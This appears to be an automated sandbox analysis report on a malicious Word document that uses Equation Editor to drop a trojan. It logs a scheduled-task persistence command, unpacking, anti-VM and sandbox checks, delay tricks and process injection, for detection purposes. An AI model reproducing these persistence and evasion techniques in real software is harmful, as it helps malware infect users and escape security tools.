                      Source: g1OsYVWymzBgTTt[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: ROGxuzog.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 7.2.missijng.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 7.2.missijng.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@9/14@12/2
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$otation-20441.docJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeMutant created: \Sessions\1\BaseNamedObjects\UhijaETApd
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCA50.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................X.......(.P.....p........................w................................................................%.....Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Quotation-20441.docVirustotal: Detection: 47%
                      Source: Quotation-20441.docReversingLabs: Detection: 48%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\missijng.exe C:\Users\user\AppData\Roaming\missijng.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ROGxuzog' /XML 'C:\Users\user\AppData\Local\Temp\tmp45B8.tmp'
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\missijng.exe C:\Users\user\AppData\Roaming\missijng.exe
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\missijng.exe C:\Users\user\AppData\Roaming\missijng.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ROGxuzog' /XML 'C:\Users\user\AppData\Local\Temp\tmp45B8.tmp'Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess created: C:\Users\user\AppData\Roaming\missijng.exe C:\Users\user\AppData\Roaming\missijng.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\missijng.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: g1OsYVWymzBgTTt[1].exe.2.dr, ITypeComp.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: ROGxuzog.exe.4.dr, ITypeComp.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.2.missijng.exe.d20000.2.unpack, ITypeComp.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 4.0.missijng.exe.d20000.0.unpack, ITypeComp.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 7.0.missijng.exe.d20000.0.unpack, ITypeComp.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 7.2.missijng.exe.d20000.1.unpack, ITypeComp.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 4_2_00D2561E push 00000000h; iretd 4_2_00D25668
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_00D2561E push 00000000h; iretd 7_2_00D25668
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_001E131F pushfd ; iretd 7_2_001E13E9
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.71456075991
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.71456075991
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\missijng.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\g1OsYVWymzBgTTt[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\missijng.exeFile created: C:\Users\user\AppData\Roaming\ROGxuzog.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ROGxuzog' /XML 'C:\Users\user\AppData\Local\Temp\tmp45B8.tmp'
                      Source: C:\Users\user\AppData\Roaming\missijng.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM_3Show sources
                      Source: Yara matchFile source: 00000004.00000002.2148163225.0000000002231000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2148188373.0000000002250000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: missijng.exe PID: 2932, type: MEMORY
                      Source: Yara matchFile source: 4.2.missijng.exe.224067c.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.missijng.exe.2301194.5.raw.unpack, type: UNPACKEDPE
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: missijng.exe, 00000004.00000002.2148163225.0000000002231000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: missijng.exe, 00000004.00000002.2148163225.0000000002231000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 4_2_00D26F5D sgdt fword ptr [eax]4_2_00D26F5D
                      Source: C:\Users\user\AppData\Roaming\missijng.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWindow / User API: threadDelayed 9533Jump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2604Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2604Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exe TID: 2840Thread sleep time: -60126s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exe TID: 2840Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exe TID: 3004Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exe TID: 2480Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exe TID: 2848Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exe TID: 2844Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exe TID: 2844Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2988Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\missijng.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: missijng.exe, 00000004.00000002.2148163225.0000000002231000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: missijng.exe, 00000004.00000002.2148163225.0000000002231000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: missijng.exe, 00000004.00000002.2151741631.00000000051AD000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: missijng.exe, 00000004.00000002.2148163225.0000000002231000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: missijng.exe, 00000004.00000002.2148163225.0000000002231000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeCode function: 7_2_00404208 LdrInitializeThunk,7_2_00404208
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Roaming\missijng.exeMemory written: C:\Users\user\AppData\Roaming\missijng.exe base: 400000 value starts with: 4D5AJump to behavior
